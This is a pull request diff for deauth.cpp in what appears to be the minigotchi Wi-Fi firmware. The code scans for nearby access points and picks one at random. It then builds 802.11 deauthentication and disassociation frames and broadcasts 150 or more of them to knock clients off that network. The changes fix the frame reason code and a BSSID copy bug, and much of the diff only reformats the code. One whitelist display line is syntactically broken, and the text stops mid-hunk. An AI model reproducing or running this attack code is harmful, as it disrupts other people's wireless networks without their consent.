### PR TITLE
Fix deauth frames

### DIFF
--- a/minigotchi/deauth.cpp
+++ b/minigotchi/deauth.cpp
@@ -50,8 +50,8 @@ uint8_t Deauth::deauthTemp[26] = {
     0xCC, // BSSID MAC (From)
     /* 22 - 23 */ 0x00,
     0x00, // Fragment & squence number
-    /* 24 - 25 */ 0x01,
-    0x00 // Reason code (1 = unspecified reason)
+    /* 24 - 25 */ 0x02,
+    0x00 // Reason code (2 = INVALID_AUTHENTICATION (Previous authentication no longer valid))
 };
 
 uint8_t Deauth::deauthFrame[26];
@@ -104,14 +104,7 @@ bool Deauth::broadcast(uint8_t *mac) {
 }
 
 void Deauth::printMac(uint8_t *mac) {
-  for (int i = 0; i < 6; i++) {
-    Serial.print(mac[i], HEX);
-    if (i < 5) {
-      Serial.print(":");
-    }
-  }
-
-  Serial.println();
+  Serial.println(printMacStr(mac));
 }
 
 String Deauth::printHidden(int network) {
@@ -128,17 +121,9 @@ String Deauth::printHidden(int network) {
 }
 
 String Deauth::printMacStr(uint8_t *mac) {
-  String macStr = "";
-  for (int i = 0; i < 6; i++) {
-    if (mac[i] < 16) {
-      macStr += "0";
-    }
-    macStr += String(mac[i], HEX);
-    if (i < 5) {
-      macStr += ":";
-    }
-  }
-  return macStr;
+  char buf[18]; // 17 for MAC, 1 for null terminator
+  snprintf(buf, sizeof(buf), "%02x:%02x:%02x:%02x:%02x:%02x", mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]);
+  return String(buf);
 }
 
 bool Deauth::select() {
@@ -246,10 +231,6 @@ bool Deauth::select() {
     // bssid
     uint8_t *apBssid = WiFi.BSSID(Deauth::randomIndex);
 
-    // set our mac address
-    uint8_t mac[WL_MAC_ADDR_LENGTH];
-    WiFi.macAddress(mac);
-
     /** developer note:
      *
      * addr1: reciever addr
@@ -262,50 +243,16 @@ bool Deauth::select() {
     std::copy(Deauth::broadcastAddr,
               Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
               Deauth::deauthFrame + 4);
-    std::copy(apBssid, apBssid + sizeof(apBssid), Deauth::deauthFrame + 10);
-    std::copy(apBssid, apBssid + sizeof(apBssid), Deauth::deauthFrame + 16);
+    std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 10);
+    std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 16);
 
     std::copy(Deauth::broadcastAddr,
               Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
               Deauth::disassociateFrame + 4);
-    std::copy(apBssid, apBssid + sizeof(apBssid),
+    std::copy(apBssid, apBssid + 6,
               Deauth::disassociateFrame + 10);
-    std::copy(apBssid, apBssid + sizeof(apBssid),
+    std::copy(apBssid, apBssid + 6,
               Deauth::disassociateFrame + 16);
-
-    if (!broadcast(Deauth::broadcastAddr)) {
-      // build deauth
-      Deauth::deauthFrame[0] = 0xC0; // type
-      Deauth::deauthFrame[1] = 0x00; // subtype
-      Deauth::deauthFrame[2] = 0x00; // duration (SDK takes care of that)
-      Deauth::deauthFrame[3] = 0x00; // duration (SDK takes care of that)
-
-      // reason
-      Deauth::deauthFrame[24] = 0x01; // reason: unspecified
-
-      std::copy(apBssid, apBssid + sizeof(apBssid), Deauth::deauthFrame + 4);
-      std::copy(Deauth::broadcastAddr,
-                Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
-                Deauth::deauthFrame + 10);
-      std::copy(Deauth::broadcastAddr,
-                Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
-                Deauth::deauthFrame + 16);
-
-      // build disassocaition
-      Deauth::disassociateFrame[0] = 0xA0; // type
-      Deauth::disassociateFrame[1] = 0x00; // subtype
-      Deauth::disassociateFrame[2] = 0x00; // duration (SDK takes care of that)
-      Deauth::disassociateFrame[3] = 0x00; // duration (SDK takes care of that)
-
-      std::copy(apBssid, apBssid + sizeof(apBssid),
-                Deauth::disassociateFrame + 4);
-      std::copy(Deauth::broadcastAddr,
-                Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
-                Deauth::disassociateFrame + 10);
-      std::copy(Deauth::broadcastAddr,
-                Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
-                Deauth::disassociateFrame + 16);
-    }
 
     Serial.print("('-') Full AP SSID: ");
     Serial.println(WiFi.SSID(Deauth::randomIndex));

--- a/minigotchi/deauth.cpp
+++ b/minigotchi/deauth.cpp
@@ -59,356 +59,356 @@ uint8_t Deauth::disassociateFrame[26];
 uint8_t Deauth::broadcastAddr[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
 
 void Deauth::add(const std::string &bssids) {
-  std::stringstream ss(bssids);
-  std::string token;
+    std::stringstream ss(bssids);
+    std::string token;
 
-  // seperate info and whitelist
-  while (std::getline(ss, token, ',')) {
-    // trim out whitespace
-    token.erase(0, token.find_first_not_of(" \t\r\n"));
-    token.erase(token.find_last_not_of(" \t\r\n") + 1);
+    // seperate info and whitelist
+    while (std::getline(ss, token, ',')) {
+        // trim out whitespace
+        token.erase(0, token.find_first_not_of(" \t\r\n"));
+        token.erase(token.find_last_not_of(" \t\r\n") + 1);
 
-    // add to whitelist
-    Serial.print("('-') Adding ");
-    Serial.print(token.c_str());
-    Serial.println(" to the whitelist");
-    Display::updateDisplay("('-')", "Adding " + (String) + " to the whitelist");
-    whitelist.push_back(token.c_str());
-  }
+        // add to whitelist
+        Serial.print("('-') Adding ");
+        Serial.print(token.c_str());
+        Serial.println(" to the whitelist");
+        Display::updateDisplay("('-')", "Adding " + (String) + " to the whitelist");
+        whitelist.push_back(token.c_str());
+    }
 }
 
 void Deauth::list() {
-  for (const auto &bssid : Config::whitelist) {
-    Deauth::add(bssid);
-  }
+    for (const auto &bssid : Config::whitelist) {
+        Deauth::add(bssid);
+    }
 }
 
 bool Deauth::send(uint8_t *buf, uint16_t len, bool sys_seq) {
-  // apparently will not work with 0 on regular, fixed on spacehuhn
-  bool sent = wifi_send_pkt_freedom(buf, len, sys_seq) == 0;
-  delay(102);
+    // apparently will not work with 0 on regular, fixed on spacehuhn
+    bool sent = wifi_send_pkt_freedom(buf, len, sys_seq) == 0;
+    delay(102);
 
-  return sent;
+    return sent;
 }
 
 // check if this is a broadcast
 // source:
 // https://github.com/SpacehuhnTech/esp8266_deauther/blob/v2/esp8266_deauther/functions.h#L334
 bool Deauth::broadcast(uint8_t *mac) {
-  for (uint8_t i = 0; i < 6; i++) {
-    if (mac[i] != broadcastAddr[i])
-      return false;
-  }
+    for (uint8_t i = 0; i < 6; i++) {
+        if (mac[i] != broadcastAddr[i])
+            return false;
+    }
 
-  return true;
+    return true;
 }
 
 void Deauth::printMac(uint8_t *mac) {
-  Serial.println(printMacStr(mac));
+    Serial.println(printMacStr(mac));
 }
 
 String Deauth::printHidden(int network) {
-  String hidden;
-  bool check = WiFi.isHidden(network);
+    String hidden;
+    bool check = WiFi.isHidden(network);
 
-  if (check == 0) {
-    hidden = "False";
-  } else {
-    hidden = "True";
-  }
+    if (check == 0) {
+        hidden = "False";
+    } else {
+        hidden = "True";
+    }
 
-  return hidden;
+    return hidden;
 }
 
 String Deauth::printMacStr(uint8_t *mac) {
-  char buf[18]; // 17 for MAC, 1 for null terminator
-  snprintf(buf, sizeof(buf), "%02x:%02x:%02x:%02x:%02x:%02x", mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]);
-  return String(buf);
+    char buf[18]; // 17 for MAC, 1 for null terminator
+    snprintf(buf, sizeof(buf), "%02x:%02x:%02x:%02x:%02x:%02x", mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]);
+    return String(buf);
 }
 
 bool Deauth::select() {
-  // reset values
-  Deauth::randomAP = "";
-  Deauth::randomIndex = -1;
+    // reset values
+    Deauth::randomAP = "";
+    Deauth::randomIndex = -1;
 
-  Parasite::sendDeauthStatus(START_SCAN);
+    Parasite::sendDeauthStatus(START_SCAN);
 
-  // cool animation, skip if parasite mode
-  if (!Config::parasite) {
-    for (int i = 0; i < 5; ++i) {
-      Serial.println("(0-o) Scanning for APs.");
-      Display::updateDisplay("(0-o)", "Scanning  for APs.");
-      delay(Config::shortDelay);
-      Serial.println("(o-0) Scanning for APs..");
-      Display::updateDisplay("(o-0)", "Scanning  for APs..");
-      delay(Config::shortDelay);
-      Serial.println("(0-o) Scanning for APs...");
-      Display::updateDisplay("(0-o)", "Scanning  for APs...");
-      delay(Config::shortDelay);
-      Serial.println(" ");
-      delay(Config::shortDelay);
-    }
-    delay(Config::longDelay);
-  }
-
-  // stop and scan
-  Minigotchi::monStop();
-
-  int apCount = 0;
-  // If a parasite channel is set, then we want to focus on that channel
-  // Otherwise go off on our own and scan for whatever is out there
-  if (Parasite::channel > 0) {
-    apCount = WiFi.scanNetworks(false, false, Parasite::channel);
-  } else {
-    apCount = WiFi.scanNetworks();
-  }
-
-  if (apCount > 0 && Deauth::randomIndex == -1) {
-    Deauth::randomIndex = random(apCount);
-    Deauth::randomAP = WiFi.SSID(Deauth::randomIndex);
-    uint8_t encType = WiFi.encryptionType(Deauth::randomIndex);
-
-    Serial.print("('-') Selected random AP: ");
-    Serial.println(randomAP.c_str());
-    Serial.println(" ");
-    Display::updateDisplay("('-')", "Selected random AP: " + randomAP);
-    delay(Config::shortDelay);
-
-    if (encType == -1 || encType == ENC_TYPE_NONE) {
-      Serial.println(
-          "('-') Selected AP is not encrypted. Skipping deauthentication...");
-      Display::updateDisplay(
-          "('-')",
-          "Selected AP is not encrypted. Skipping deauthentication...");
-      Parasite::sendDeauthStatus(SKIPPING_UNENCRYPTED);
-      return false;
+    // cool animation, skip if parasite mode
+    if (!Config::parasite) {
+        for (int i = 0; i < 5; ++i) {
+            Serial.println("(0-o) Scanning for APs.");
+            Display::updateDisplay("(0-o)", "Scanning  for APs.");
+            delay(Config::shortDelay);
+            Serial.println("(o-0) Scanning for APs..");
+            Display::updateDisplay("(o-0)", "Scanning  for APs..");
+            delay(Config::shortDelay);
+            Serial.println("(0-o) Scanning for APs...");
+            Display::updateDisplay("(0-o)", "Scanning  for APs...");
+            delay(Config::shortDelay);
+            Serial.println(" ");
+            delay(Config::shortDelay);
+        }
+        delay(Config::longDelay);
     }
 
-    // check for ap in whitelist
-    if (std::find(whitelist.begin(), whitelist.end(), randomAP) !=
-        whitelist.end()) {
-      Serial.println("('-') Selected AP is in the whitelist. Skipping "
-                     "deauthentication...");
-      Display::updateDisplay(
-          "('-')",
-          "Selected AP is in the whitelist. Skipping deauthentication...");
-      Parasite::sendDeauthStatus(SKIPPING_WHITELIST);
-      return false;
+    // stop and scan
+    Minigotchi::monStop();
+
+    int apCount = 0;
+    // If a parasite channel is set, then we want to focus on that channel
+    // Otherwise go off on our own and scan for whatever is out there
+    if (Parasite::channel > 0) {
+        apCount = WiFi.scanNetworks(false, false, Parasite::channel);
+    } else {
+        apCount = WiFi.scanNetworks();
     }
 
-    /** developer note:
-     *
-     * here we will create the deauth frame using the header,
-     * as we find the AP in question we also generate the required information
-     * for it as well...
-     *
-     */
+    if (apCount > 0 && Deauth::randomIndex == -1) {
+        Deauth::randomIndex = random(apCount);
+        Deauth::randomAP = WiFi.SSID(Deauth::randomIndex);
+        uint8_t encType = WiFi.encryptionType(Deauth::randomIndex);
 
-    // clear out exisitng frame...
-    std::fill(std::begin(Deauth::deauthFrame), std::end(Deauth::deauthFrame),
-              0);
-    std::fill(std::begin(Deauth::disassociateFrame),
-              std::end(Deauth::disassociateFrame), 0);
+        Serial.print("('-') Selected random AP: ");
+        Serial.println(randomAP.c_str());
+        Serial.println(" ");
+        Display::updateDisplay("('-')", "Selected random AP: " + randomAP);
+        delay(Config::shortDelay);
 
-    // copy template
-    std::copy(Deauth::deauthTemp,
-              Deauth::deauthTemp + sizeof(Deauth::deauthTemp),
-              Deauth::deauthFrame);
-    std::copy(Deauth::deauthTemp,
-              Deauth::deauthTemp + sizeof(Deauth::deauthTemp),
-              Deauth::disassociateFrame);
+        if (encType == -1 || encType == ENC_TYPE_NONE) {
+            Serial.println(
+                "('-') Selected AP is not encrypted. Skipping deauthentication...");
+            Display::updateDisplay(
+                "('-')",
+                "Selected AP is not encrypted. Skipping deauthentication...");
+            Parasite::sendDeauthStatus(SKIPPING_UNENCRYPTED);
+            return false;
+        }
 
-    Deauth::deauthFrame[0] = 0xC0; // type
-    Deauth::deauthFrame[1] = 0x00; // subtype
-    Deauth::deauthFrame[2] = 0x00; // duration (SDK takes care of that)
-    Deauth::deauthFrame[3] = 0x00; // duration (SDK takes care of that)
+        // check for ap in whitelist
+        if (std::find(whitelist.begin(), whitelist.end(), randomAP) !=
+                whitelist.end()) {
+            Serial.println("('-') Selected AP is in the whitelist. Skipping "
+                           "deauthentication...");
+            Display::updateDisplay(
+                "('-')",
+                "Selected AP is in the whitelist. Skipping deauthentication...");
+            Parasite::sendDeauthStatus(SKIPPING_WHITELIST);
+            return false;
+        }
 
-    Deauth::disassociateFrame[0] = 0xA0; // type
-    Deauth::disassociateFrame[1] = 0x00; // subtype
-    Deauth::disassociateFrame[2] = 0x00; // duration (SDK takes care of that)
-    Deauth::disassociateFrame[3] = 0x00; // duration (SDK takes care of that)
+        /** developer note:
+         *
+         * here we will create the deauth frame using the header,
+         * as we find the AP in question we also generate the required information
+         * for it as well...
+         *
+         */
 
-    // bssid
-    uint8_t *apBssid = WiFi.BSSID(Deauth::randomIndex);
+        // clear out exisitng frame...
+        std::fill(std::begin(Deauth::deauthFrame), std::end(Deauth::deauthFrame),
+                  0);
+        std::fill(std::begin(Deauth::disassociateFrame),
+                  std::end(Deauth::disassociateFrame), 0);
 
-    /** developer note:
-     *
-     * addr1: reciever addr
-     * addr2: sender addr
-     * addr3: filtering addr
-     *
-     */
+        // copy template
+        std::copy(Deauth::deauthTemp,
+                  Deauth::deauthTemp + sizeof(Deauth::deauthTemp),
+                  Deauth::deauthFrame);
+        std::copy(Deauth::deauthTemp,
+                  Deauth::deauthTemp + sizeof(Deauth::deauthTemp),
+                  Deauth::disassociateFrame);
 
-    // copy our mac(s) to header
-    std::copy(Deauth::broadcastAddr,
-              Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
-              Deauth::deauthFrame + 4);
-    std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 10);
-    std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 16);
+        Deauth::deauthFrame[0] = 0xC0; // type
+        Deauth::deauthFrame[1] = 0x00; // subtype
+        Deauth::deauthFrame[2] = 0x00; // duration (SDK takes care of that)
+        Deauth::deauthFrame[3] = 0x00; // duration (SDK takes care of that)
 
-    std::copy(Deauth::broadcastAddr,
-              Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
-              Deauth::disassociateFrame + 4);
-    std::copy(apBssid, apBssid + 6,
-              Deauth::disassociateFrame + 10);
-    std::copy(apBssid, apBssid + 6,
-              Deauth::disassociateFrame + 16);
+        Deauth::disassociateFrame[0] = 0xA0; // type
+        Deauth::disassociateFrame[1] = 0x00; // subtype
+        Deauth::disassociateFrame[2] = 0x00; // duration (SDK takes care of that)
+        Deauth::disassociateFrame[3] = 0x00; // duration (SDK takes care of that)
 
-    Serial.print("('-') Full AP SSID: ");
-    Serial.println(WiFi.SSID(Deauth::randomIndex));
-    Display::updateDisplay("('-')",
-                           "Full AP SSID: " + WiFi.SSID(Deauth::randomIndex));
+        // bssid
+        uint8_t *apBssid = WiFi.BSSID(Deauth::randomIndex);
 
-    Serial.print("('-') AP Encryption: ");
-    Serial.println(WiFi.encryptionType(Deauth::randomIndex));
-    Display::updateDisplay(
-        "('-')",
-        "AP Encryption: " + (String)WiFi.encryptionType(Deauth::randomIndex));
+        /** developer note:
+         *
+         * addr1: reciever addr
+         * addr2: sender addr
+         * addr3: filtering addr
+         *
+         */
 
-    Serial.print("('-') AP RSSI: ");
-    Serial.println(WiFi.RSSI(Deauth::randomIndex));
-    Display::updateDisplay("('-')", "AP RSSI: " +
-                                        (String)WiFi.RSSI(Deauth::randomIndex));
+        // copy our mac(s) to header
+        std::copy(Deauth::broadcastAddr,
+                  Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
+                  Deauth::deauthFrame + 4);
+        std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 10);
+        std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 16);
 
-    Serial.print("('-') AP BSSID: ");
-    printMac(apBssid);
-    Display::updateDisplay("('-')",
-                           "AP BSSID: " + Deauth::printMacStr(apBssid));
+        std::copy(Deauth::broadcastAddr,
+                  Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
+                  Deauth::disassociateFrame + 4);
+        std::copy(apBssid, apBssid + 6,
+                  Deauth::disassociateFrame + 10);
+        std::copy(apBssid, apBssid + 6,
+                  Deauth::disassociateFrame + 16);
 
-    Serial.print("('-') AP Channel: ");
-    Serial.println(WiFi.channel(Deauth::randomIndex));
-    Display::updateDisplay(
-        "('-')", "AP Channel: " + (String)WiFi.channel(Deauth::randomIndex));
+        Serial.print("('-') Full AP SSID: ");
+        Serial.println(WiFi.SSID(Deauth::randomIndex));
+        Display::updateDisplay("('-')",
+                               "Full AP SSID: " + WiFi.SSID(Deauth::randomIndex));
 
-    Serial.print("('-') AP Hidden?: ");
-    Serial.println(Deauth::printHidden(Deauth::randomIndex));
-    Display::updateDisplay(
-        "('-')", "AP Hidden?: " + Deauth::printHidden(Deauth::randomIndex));
-    Serial.println(" ");
-    delay(Config::longDelay);
+        Serial.print("('-') AP Encryption: ");
+        Serial.println(WiFi.encryptionType(Deauth::randomIndex));
+        Display::updateDisplay(
+            "('-')",
+            "AP Encryption: " + (String)WiFi.encryptionType(Deauth::randomIndex));
 
-    Parasite::sendDeauthStatus(PICKED_AP, Deauth::randomAP.c_str(),
-                               WiFi.channel(Deauth::randomIndex));
+        Serial.print("('-') AP RSSI: ");
+        Serial.println(WiFi.RSSI(Deauth::randomIndex));
+        Display::updateDisplay("('-')", "AP RSSI: " +
+                               (String)WiFi.RSSI(Deauth::randomIndex));
 
-    return true;
-  } else if (apCount < 0) {
-    Serial.println("(;-;) I don't know what you did, but you screwed up!");
-    Serial.println(" ");
-    Display::updateDisplay("(;-;)", "You screwed up somehow!");
+        Serial.print("('-') AP BSSID: ");
+        printMac(apBssid);
+        Display::updateDisplay("('-')",
+                               "AP BSSID: " + Deauth::printMacStr(apBssid));
 
-    Parasite::sendDeauthStatus(DEAUTH_SCAN_ERROR);
+        Serial.print("('-') AP Channel: ");
+        Serial.println(WiFi.channel(Deauth::randomIndex));
+        Display::updateDisplay(
+            "('-')", "AP Channel: " + (String)WiFi.channel(Deauth::randomIndex));
 
-    delay(Config::shortDelay);
-  } else {
-    // well ur fucked.
-    Serial.println("(;-;) No access points found.");
-    Serial.println(" ");
-    Display::updateDisplay("(;-;)", "No access points found.");
+        Serial.print("('-') AP Hidden?: ");
+        Serial.println(Deauth::printHidden(Deauth::randomIndex));
+        Display::updateDisplay(
+            "('-')", "AP Hidden?: " + Deauth::printHidden(Deauth::randomIndex));
+        Serial.println(" ");
+        delay(Config::longDelay);
 
-    Parasite::sendDeauthStatus(NO_APS);
+        Parasite::sendDeauthStatus(PICKED_AP, Deauth::randomAP.c_str(),
+                                   WiFi.channel(Deauth::randomIndex));
 
-    delay(Config::shortDelay);
-  }
-  return false;
+        return true;
+    } else if (apCount < 0) {
+        Serial.println("(;-;) I don't know what you did, but you screwed up!");
+        Serial.println(" ");
+        Display::updateDisplay("(;-;)", "You screwed up somehow!");
+
+        Parasite::sendDeauthStatus(DEAUTH_SCAN_ERROR);
+
+        delay(Config::shortDelay);
+    } else {
+        // well ur fucked.
+        Serial.println("(;-;) No access points found.");
+        Serial.println(" ");
+        Display::updateDisplay("(;-;)", "No access points found.");
+
+        Parasite::sendDeauthStatus(NO_APS);
+
+        delay(Config::shortDelay);
+    }
+    return false;
 }
 
 void Deauth::deauth() {
-  if (Config::deauth) {
-    // select AP
-    if (Deauth::select()) {
-      if (randomAP.length() > 0) {
-        Serial.println(
-            "(>-<) Starting deauthentication attack on the selected AP...");
-        Serial.println(" ");
-        Display::updateDisplay("(>-<)", "Begin deauth-attack on AP...");
-        delay(Config::shortDelay);
-        // define the attack
-        if (!running) {
-          start();
-        } else {
-          Serial.println("('-') Attack is already running.");
-          Serial.println(" ");
-          Display::updateDisplay("('-')", "Attack is already running.");
-          delay(Config::shortDelay);
+    if (Config::deauth) {
+        // select AP
+        if (Deauth::select()) {
+            if (randomAP.length() > 0) {
+                Serial.println(
+                    "(>-<) Starting deauthentication attack on the selected AP...");
+                Serial.println(" ");
+                Display::updateDisplay("(>-<)", "Begin deauth-attack on AP...");
+                delay(Config::shortDelay);
+                // define the attack
+                if (!running) {
+                    start();
+                } else {
+                    Serial.println("('-') Attack is already running.");
+                    Serial.println(" ");
+                    Display::updateDisplay("('-')", "Attack is already running.");
+                    delay(Config::shortDelay);
+                }
+            } else {
+                // ok why did you modify the deauth function? i literally told you to
+                // not do that...
+                Serial.println("(X-X) No access point selected. Use select() first.");
+                Serial.println("('-') Told you so!");
+                Serial.println(" ");
+                Display::updateDisplay("(X-X)",
+                                       "No access point selected. Use select() first.");
+                delay(Config::shortDelay);
+                Display::updateDisplay("('-')", "Told you so!");
+                delay(Config::shortDelay);
+                return;
+            }
         }
-      } else {
-        // ok why did you modify the deauth function? i literally told you to
-        // not do that...
-        Serial.println("(X-X) No access point selected. Use select() first.");
-        Serial.println("('-') Told you so!");
-        Serial.println(" ");
-        Display::updateDisplay("(X-X)",
-                               "No access point selected. Use select() first.");
-        delay(Config::shortDelay);
-        Display::updateDisplay("('-')", "Told you so!");
-        delay(Config::shortDelay);
-        return;
-      }
+    } else {
+        // do nothing if deauthing is disabled
     }
-  } else {
-    // do nothing if deauthing is disabled
-  }
 }
 
 void Deauth::start() {
-  running = true;
-  int deauthFrameSize = sizeof(deauthFrame);
-  int disassociateFrameSize = sizeof(disassociateFrame);
-  int packets = 0;
-  unsigned long startTime = millis();
+    running = true;
+    int deauthFrameSize = sizeof(deauthFrame);
+    int disassociateFrameSize = sizeof(disassociateFrame);
+    int packets = 0;
+    unsigned long startTime = millis();
 
-  // packet calculation
-  int basePacketCount = 150;
-  int rssi = WiFi.RSSI(Deauth::randomIndex);
-  int numDevices = WiFi.softAPgetStationNum();
+    // packet calculation
+    int basePacketCount = 150;
+    int rssi = WiFi.RSSI(Deauth::randomIndex);
+    int numDevices = WiFi.softAPgetStationNum();
 
-  int packetCount = basePacketCount + (numDevices * 10);
-  if (rssi > -50) {
-    packetCount /= 2; // strong signal
-  } else if (rssi < -80) {
-    packetCount *= 2; // weak signal
-  }
-
-  Parasite::sendDeauthStatus(START_DEAUTH, Deauth::randomAP.c_str(),
-                             WiFi.channel(Deauth::randomIndex));
-
-  // send the deauth 150 times(ur cooked if they find out)
-  for (int i = 0; i < packetCount; ++i) {
-    if (Deauth::send(deauthFrame, deauthFrameSize, 0) &&
-        Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
-      packets++;
-      float pps = packets / (float)(millis() - startTime) * 1000;
-
-      // show pps
-      if (!isinf(pps)) {
-        Serial.print("(>-<) Packets per second: ");
-        Serial.print(pps);
-        Serial.print(" pkt/s");
-        Serial.println(" (AP:" + randomAP + ")");
-        Display::updateDisplay("(>-<)", "Packets per second: " + (String)pps +
-                                            " pkt/s" + "(AP:" + randomAP + ")");
-      }
-    } else if (!Deauth::send(deauthFrame, deauthFrameSize, 0) &&
-               !Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
-      Serial.println("(X-X) Both packets failed to send!");
-      Display::updateDisplay("(X-X)", "Both packets failed to send!");
-    } else if (!Deauth::send(deauthFrame, deauthFrameSize, 0) &&
-               Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
-      Serial.println("(X-X) Deauthentication failed to send!");
-      Display::updateDisplay("(X-X)", "Deauth failed to send!");
-    } else if (Deauth::send(deauthFrame, deauthFrameSize, 0) &&
-               !Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
-      Serial.println("(X-X) Disassociation failed to send!");
-      Display::updateDisplay("(X-X)", "Disassoc failed to send!");
-    } else {
-      Serial.println("(X-X) Unable to calculate pkt/s!");
-      Display::updateDisplay("(X-X)", "Unable to calculate pkt/s!");
+    int packetCount = basePacketCount + (numDevices * 10);
+    if (rssi > -50) {
+        packetCount /= 2; // strong signal
+    } else if (rssi < -80) {
+        packetCount *= 2; // weak signal
     }
-  }
 
-  Serial.println(" ");
-  Serial.println("(^-^) Attack finished!");
-  Serial.println(" ");
-  Display::updateDisplay("(^-^)", "Attack finished!");
-  running = false;
+    Parasite::sendDeauthStatus(START_DEAUTH, Deauth::randomAP.c_str(),
+                               WiFi.channel(Deauth::randomIndex));
+
+    // send the deauth 150 times(ur cooked if they find out)
+    for (int i = 0; i < packetCount; ++i) {
+        if (Deauth::send(deauthFrame, deauthFrameSize, 0) &&
+                Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
+            packets++;
+            float pps = packets / (float)(millis() - startTime) * 1000;
+
+            // show pps
+            if (!isinf(pps)) {
+                Serial.print("(>-<) Packets per second: ");
+                Serial.print(pps);
+                Serial.print(" pkt/s");
+                Serial.println(" (AP:" + randomAP + ")");
+                Display::updateDisplay("(>-<)", "Packets per second: " + (String)pps +
+                                       " pkt/s" + "(AP:" + randomAP + ")");
+            }
+        } else if (!Deauth::send(deauthFrame, deauthFrameSize, 0) &&
+                   !Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
+            Serial.println("(X-X) Both packets failed to send!");
+            Display::updateDisplay("(X-X)", "Both packets failed to send!");
+        } else if (!Deauth::send(deauthFrame, deauthFrameSize, 0) &&
+                   Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
+            Serial.println("(X-X) Deauthentication failed to send!");
+            Display::updateDisplay("(X-X)", "Deauth failed to send!");
+        } else if (Deauth::send(deauthFrame, deauthFrameSize, 0) &&
+                   !Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
+            Serial.println("(X-X) Disassociation failed to send!");
+            Display::updateDisplay("(X-X)", "Disassoc failed to send!");
+        } else {
+            Serial.println("(X-X) Unable to calculate pkt/s!");
+            Display::updateDisplay("(X-X)", "Unable to calculate pkt/s!");
+        }
+    }
+
+    Serial.println(" ");
+    Serial.println("(^-^) Attack finished!");
+    Serial.println(" ");
+    Display::updateDisplay("(^-^)", "Attack finished!");
+    running = false;
 }

--- a/minigotchi/deauth.cpp
+++ b/minigotchi/deauth.cpp
@@ -51,7 +51,8 @@ uint8_t Deauth::deauthTemp[26] = {
     /* 22 - 23 */ 0x00,
     0x00, // Fragment & squence number
     /* 24 - 25 */ 0x02,
-    0x00 // Reason code (2 = INVALID_AUTHENTICATION (Previous authentication no longer valid))
+    0x00 // Reason code (2 = INVALID_AUTHENTICATION (Previous authentication no
+         // longer valid))
 };
 
 uint8_t Deauth::deauthFrame[26];
@@ -59,356 +60,353 @@ uint8_t Deauth::disassociateFrame[26];
 uint8_t Deauth::broadcastAddr[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
 
 void Deauth::add(const std::string &bssids) {
-    std::stringstream ss(bssids);
-    std::string token;
+  std::stringstream ss(bssids);
+  std::string token;
 
-    // seperate info and whitelist
-    while (std::getline(ss, token, ',')) {
-        // trim out whitespace
-        token.erase(0, token.find_first_not_of(" \t\r\n"));
-        token.erase(token.find_last_not_of(" \t\r\n") + 1);
+  // seperate info and whitelist
+  while (std::getline(ss, token, ',')) {
+    // trim out whitespace
+    token.erase(0, token.find_first_not_of(" \t\r\n"));
+    token.erase(token.find_last_not_of(" \t\r\n") + 1);
 
-        // add to whitelist
-        Serial.print("('-') Adding ");
-        Serial.print(token.c_str());
-        Serial.println(" to the whitelist");
-        Display::updateDisplay("('-')", "Adding " + (String) + " to the whitelist");
-        whitelist.push_back(token.c_str());
-    }
+    // add to whitelist
+    Serial.print("('-') Adding ");
+    Serial.print(token.c_str());
+    Serial.println(" to the whitelist");
+    Display::updateDisplay("('-')", "Adding " + (String) + " to the whitelist");
+    whitelist.push_back(token.c_str());
+  }
 }
 
 void Deauth::list() {
-    for (const auto &bssid : Config::whitelist) {
-        Deauth::add(bssid);
-    }
+  for (const auto &bssid : Config::whitelist) {
+    Deauth::add(bssid);
+  }
 }
 
 bool Deauth::send(uint8_t *buf, uint16_t len, bool sys_seq) {
-    // apparently will not work with 0 on regular, fixed on spacehuhn
-    bool sent = wifi_send_pkt_freedom(buf, len, sys_seq) == 0;
-    delay(102);
+  // apparently will not work with 0 on regular, fixed on spacehuhn
+  bool sent = wifi_send_pkt_freedom(buf, len, sys_seq) == 0;
+  delay(102);
 
-    return sent;
+  return sent;
 }
 
 // check if this is a broadcast
 // source:
 // https://github.com/SpacehuhnTech/esp8266_deauther/blob/v2/esp8266_deauther/functions.h#L334
 bool Deauth::broadcast(uint8_t *mac) {
-    for (uint8_t i = 0; i < 6; i++) {
-        if (mac[i] != broadcastAddr[i])
-            return false;
-    }
+  for (uint8_t i = 0; i < 6; i++) {
+    if (mac[i] != broadcastAddr[i])
+      return false;
+  }
 
-    return true;
+  return true;
 }
 
-void Deauth::printMac(uint8_t *mac) {
-    Serial.println(printMacStr(mac));
-}
+void Deauth::printMac(uint8_t *mac) { Serial.println(printMacStr(mac)); }
 
 String Deauth::printHidden(int network) {
-    String hidden;
-    bool check = WiFi.isHidden(network);
+  String hidden;
+  bool check = WiFi.isHidden(network);
 
-    if (check == 0) {
-        hidden = "False";
-    } else {
-        hidden = "True";
-    }
+  if (check == 0) {
+    hidden = "False";
+  } else {
+    hidden = "True";
+  }
 
-    return hidden;
+  return hidden;
 }
 
 String Deauth::printMacStr(uint8_t *mac) {
-    char buf[18]; // 17 for MAC, 1 for null terminator
